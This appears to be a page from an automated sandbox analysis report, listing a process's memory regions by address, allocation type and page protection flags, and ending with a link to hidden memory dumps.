page read and write
3C70000
heap
page read and write
33B2000
heap
page read and write
804E000
stack
page read and write
28BE000
stack
page read and write
2EADA599000
heap
page read and write
3143000
trusted library allocation
page read and write
1020000
trusted library allocation
page read and write
3198000
trusted library allocation
page read and write
5271000
trusted library allocation
page read and write
2CE7000
heap
page read and write
FE0000
trusted library allocation
page read and write
2EAD1DA1000
trusted library allocation
page read and write
2EADEF7D000
heap
page read and write
53F0000
heap
page execute and read and write
7FFD99B06000
trusted library allocation
page read and write
1B85E000
stack
page read and write
43CC000
stack
page read and write
1A4A000
heap
page read and write
2F7AC000
heap
page read and write
38CD000
heap
page read and write
18788543000
heap
page read and write
E4F000
stack
page read and write
2FA72000
heap
page read and write
18783EB0000
trusted library section
page readonly
4E1E000
stack
page read and write
5B81000
unkown
page read and write
5580000
trusted library allocation
page read and write
5CC000
heap
page read and write
F8A000
heap
page read and write
2F90A000
heap
page read and write
48D9000
heap
page read and write
38DA000
heap
page read and write
38ED000
heap
page read and write
274E000
unkown
page read and write
7FF477482000
trusted library allocation
page readonly
3055EFE000
unkown
page readonly
61EB7000
direct allocation
page readonly
7540000
trusted library allocation
page read and write
41C000
unkown
page execute read
72B0000
heap
page execute and read and write
38B1000
heap
page read and write
C3B000
stack
page read and write
5D0000
heap
page read and write
1FC000
stack
page read and write
2EADE9FB000
heap
page read and write
2EADE910000
heap
page read and write
C50000
heap
page read and write
18789000000
heap
page read and write
38ED000
heap
page read and write
C93000
heap
page read and write
401000
unkown
page execute read
2EADA581000
heap
page read and write
3310000
heap
page read and write
22505000
heap
page read and write
18788400000
heap
page read and write
38D2000
heap
page read and write
858000
heap
page read and write
30540FE000
unkown
page readonly
2B70000
heap
page read and write
1878371B000
heap
page read and write
75E000
unkown
page write copy
2F798000
heap
page read and write
187883F0000
trusted library allocation
page read and write
33C4000
unkown
page read and write
6DE2000
heap
page read and write
38F0000
heap
page read and write
1B99E000
stack
page read and write
3568000
heap
page read and write
28AE000
unkown
page read and write
2EAD9D70000
trusted library allocation
page read and write
2EAC0216000
heap
page read and write
5282000
trusted library allocation
page read and write
6C3F9000
unkown
page write copy
6C2A0000
unkown
page readonly
3204000
trusted library allocation
page read and write
1878850A000
heap
page read and write
DB0000
unkown
page write copy
6DF0000
heap
page read and write
431000
unkown
page read and write
2903000
heap
page read and write
258B000
direct allocation
page read and write
389A000
heap
page read and write
7F90000
trusted library allocation
page read and write
445E000
unkown
page read and write
FD91BF6000
stack
page read and write
5051000
unkown
page read and write
18782E7A000
heap
page read and write
1878371A000
heap
page read and write
264C000
direct allocation
page read and write
2EAE0A60000
trusted library allocation
page read and write
2EADEED2000
heap
page read and write
22500000
heap
page read and write
FD919FB000
stack
page read and write
193000
stack
page read and write
2784000
unkown
page read and write
224EE000
heap
page read and write
2EAC029A000
heap
page read and write
3912000
heap
page read and write
38E4000
heap
page read and write
19F9000
unkown
page readonly
18788350000
trusted library allocation
page read and write
2784000
unkown
page read and write
4FFE000
stack
page read and write
2FB2000
trusted library allocation
page read and write
77B000
unkown
page write copy
6E00000
heap
page read and write
49CC000
stack
page read and write
6CE7000
heap
page read and write
320D000
trusted library allocation
page read and write
2FEF000
heap
page read and write
2EADEF41000
heap
page read and write
371B000
heap
page read and write
2784000
unkown
page read and write
401000
unkown
page execute read
445000
unkown
page readonly
2EAC1D41000
trusted library allocation
page read and write
25CD000
direct allocation
page read and write
2EAC20C4000
trusted library allocation
page read and write
18783602000
heap
page read and write
3054B7E000
stack
page read and write
38CD000
heap
page read and write
7FFD99AA0000
trusted library allocation
page read and write
7FF477488000
trusted library allocation
page readonly
2784000
unkown
page read and write
2EADF073000
heap
page read and write
2EADA5FC000
heap
page read and write
9D0000
heap
page read and write
224F0000
heap
page read and write
E75000
heap
page read and write
3767000
heap
page read and write
5051000
unkown
page read and write
8070000
heap
page read and write
2EADEE70000
heap
page read and write
7FFD99A60000
trusted library allocation
page read and write
3883000
heap
page read and write
55E2000
trusted library allocation
page read and write
1042000
trusted library allocation
page read and write
25AF000
direct allocation
page read and write
1C14B000
heap
page read and write
38CE000
heap
page read and write
1AC9000
heap
page read and write
7FF47748E000
trusted library allocation
page readonly
224E3000
heap
page read and write
38F1000
heap
page read and write
401000
unkown
page execute read
2784000
unkown
page read and write
5F8000
heap
page read and write
F40000
heap
page read and write
A94000
heap
page read and write
2EABC7C0000
unkown
page readonly
33C4000
unkown
page read and write
5051000
unkown
page read and write
5051000
unkown
page read and write
3054BFE000
unkown
page readonly
38CD000
heap
page read and write
5CE000
stack
page read and write
1878850E000
heap
page read and write
3912000
heap
page read and write
18789010000
heap
page read and write
DDF000
stack
page read and write
1A10000
heap
page read and write
2F6E9000
heap
page read and write
2FB8000
trusted library allocation
page read and write
7F0000
heap
page read and write
2784000
unkown
page read and write
2E6A000
trusted library allocation
page read and write
715E000
stack
page read and write
26AA000
direct allocation
page read and write
2EADEE87000
heap
page read and write
1C041000
heap
page read and write
2FB5000
trusted library allocation
page read and write
C6A000
heap
page read and write
545E000
stack
page read and write
30550FE000
unkown
page readonly
5590000
trusted library allocation
page execute and read and write
38B8000
heap
page read and write
2784000
unkown
page read and write
6380000
trusted library allocation
page execute and read and write
6B3D1000
unkown
page execute read
6CE0000
heap
page read and write
FD91CF8000
stack
page read and write
2EAE0A00000
trusted library allocation
page read and write
FD90BEE000
stack
page read and write
38C1000
trusted library allocation
page read and write
2C2E000
stack
page read and write
4B5E000
stack
page read and write
2257B000
heap
page read and write
187882B2000
trusted library allocation
page read and write
7FFD99AF0000
trusted library allocation
page read and write
538F000
stack
page read and write
2EADEA1E000
heap
page read and write
2E16000
trusted library allocation
page read and write
3581000
heap
page read and write
2C83000
trusted library allocation
page execute and read and write
1A1D000
unkown
page readonly
6D7E000
stack
page read and write
38CC000
heap
page read and write
2EADA5B8000
heap
page read and write
2EAC1D30000
heap
page execute and read and write
5590000
heap
page read and write
2731000
trusted library allocation
page read and write
187883A4000
trusted library allocation
page read and write
3140000
trusted library allocation
page read and write
113B000
heap
page read and write
825F000
stack
page read and write
1B2B000
heap
page read and write
301B000
trusted library allocation
page read and write
61BE000
stack
page read and write
6E1B000
stack
page read and write
400000
unkown
page readonly
3000000
heap
page read and write
2EADA644000
heap
page execute and read and write
900000
unkown
page readonly
38E9000
heap
page read and write
2F76000
trusted library allocation
page read and write
CA4000
heap
page read and write
306D000
trusted library allocation
page read and write
2217A000
heap
page read and write
DB0000
unkown
page write copy
2F91E000
heap
page read and write
3717000
heap
page read and write
6F5E000
stack
page read and write
28C1000
trusted library allocation
page read and write
18788353000
trusted library allocation
page read and write
2FEE000
heap
page read and write
38C5000
heap
page read and write
76D000
unkown
page read and write
224ED000
heap
page read and write
38B6000
heap
page read and write
2F6B2000
heap
page read and write
26E0000
trusted library allocation
page read and write
26EB000
trusted library allocation
page read and write
2670000
direct allocation
page read and write
30D0000
trusted library allocation
page read and write
7F80000
trusted library allocation
page execute and read and write
2EADEACC000
heap
page read and write
52A3000
trusted library allocation
page read and write
2B6F000
stack
page read and write
18788306000
trusted library allocation
page read and write
2F7E8000
heap
page read and write
2F680000
heap
page read and write
300F000
stack
page read and write
2784000
unkown
page read and write
7FFD99850000
trusted library allocation
page read and write
FD91E7E000
stack
page read and write
104B000
trusted library allocation
page execute and read and write
527E000
stack
page read and write
1878853F000
heap
page read and write
61ED3000
direct allocation
page read and write
2ED0000
remote allocation
page read and write
450000
heap
page read and write
187883B7000
trusted library allocation
page read and write
537E000
stack
page read and write
38C7000
heap
page read and write
2FA09000
heap
page read and write
2EADF086000
heap
page read and write
73FE000
stack
page read and write
6DE0000
heap
page read and write
2FFD000
heap
page read and write
26CE000
stack
page read and write
41C9000
trusted library allocation
page read and write
FD9207D000
stack
page read and write
2250D000
heap
page read and write
64D000
heap
page read and write
10B0000
heap
page read and write
3717000
heap
page read and write
2FF7000
heap
page read and write
2F7CF000
heap
page read and write
2F9F0000
heap
page read and write
5413000
heap
page read and write
2F79D000
heap
page read and write
38CE000
heap
page read and write
306F000
trusted library allocation
page read and write
5B80000
unkown
page read and write
18782E9F000
heap
page read and write
760D000
stack
page read and write
706E000
stack
page read and write
6C631000
unkown
page execute read
3136000
trusted library allocation
page read and write
22504000
heap
page read and write
2EADEFB7000
heap
page read and write
7A90000
heap
page read and write
2B75000
unkown
page read and write
428F000
stack
page read and write
3855000
heap
page read and write
62C0000
trusted library allocation
page execute and read and write
71DD000
heap
page read and write
3720000
unkown
page read and write
18782F13000
heap
page read and write
2EADEDD0000
heap
page read and write
6330000
trusted library allocation
page execute and read and write
102A000
trusted library allocation
page execute and read and write
8FA000
stack
page read and write
3841000
heap
page read and write
7FFD99860000
trusted library allocation
page read and write
18783700000
heap
page read and write
C77000
heap
page read and write
25DD000
direct allocation
page read and write
38E4000
heap
page read and write
5BE000
heap
page read and write
38B2000
heap
page read and write
270E000
unkown
page read and write
38CC000
heap
page read and write
6C407000
unkown
page readonly
2784000
unkown
page read and write
7FFD99A80000
trusted library allocation
page read and write
2EAC1BA3000
trusted library allocation
page read and write
224FF000
heap
page read and write
22188000
heap
page read and write
7580000
trusted library allocation
page read and write
1B95F000
stack
page read and write
3200000
unkown
page readonly
33C4000
unkown
page read and write
1BECE000
stack
page read and write
2EADA5E3000
heap
page read and write
7FFD99A00000
trusted library allocation
page read and write
3912000
heap
page read and write
2769000
trusted library allocation
page read and write
33A2000
heap
page read and write
2918000
unkown
page read and write
18782EAE000
heap
page read and write
1BADE000
stack
page read and write
A94000
heap
page read and write
371B000
heap
page read and write
3023000
trusted library allocation
page read and write
38EA000
heap
page read and write
617C000
stack
page read and write
7FFD99B50000
trusted library allocation
page read and write
38B2000
heap
page read and write
2F635000
heap
page read and write
25AC000
direct allocation
page read and write
61ECD000
direct allocation
page readonly
33C4000
unkown
page read and write
38D7000
heap
page read and write
1106000
heap
page read and write
3859000
heap
page read and write
B10000
heap
page read and write
2F76B000
heap
page read and write
7FFD99BF0000
trusted library allocation
page read and write
38B8000
heap
page read and write
2EAE0A50000
trusted library allocation
page read and write
2EADEE72000
heap
page read and write
2784000
unkown
page read and write
33C1000
heap
page read and write
7A1E000
stack
page read and write
1BD7E000
stack
page read and write
26B8000
direct allocation
page read and write
4980000
trusted library allocation
page read and write
38C2000
heap
page read and write
FD9237D000
stack
page read and write
C5D000
heap
page read and write
1109000
heap
page read and write
335E000
unkown
page read and write
919000
heap
page read and write
2B70000
unkown
page read and write
2EADEA22000
heap
page read and write
2CD0000
trusted library allocation
page read and write
187884C1000
heap
page read and write
C46000
heap
page read and write
2D60000
heap
page execute and read and write
1B1E000
heap
page read and write
A34000
heap
page read and write
38E5000
heap
page read and write
7570000
trusted library allocation
page read and write
4A5E000
stack
page read and write
4D78000
trusted library allocation
page read and write
283F000
stack
page read and write
2E4A000
heap
page read and write
3912000
heap
page read and write
2B23000
heap
page read and write
6FA0000
trusted library allocation
page read and write
FF8E0000
trusted library allocation
page execute and read and write
813000
unkown
page readonly
7FFD99A64000
trusted library allocation
page read and write
1878375C000
heap
page read and write
7590000
trusted library allocation
page read and write
5998000
trusted library allocation
page read and write
1133000
heap
page read and write
E30000
heap
page read and write
F76000
heap
page read and write
31FE000
trusted library allocation
page read and write
7FFD99AB0000
trusted library allocation
page read and write
A18000
heap
page read and write
401000
unkown
page execute read
There are 1989 hidden memdumps, click here to show them.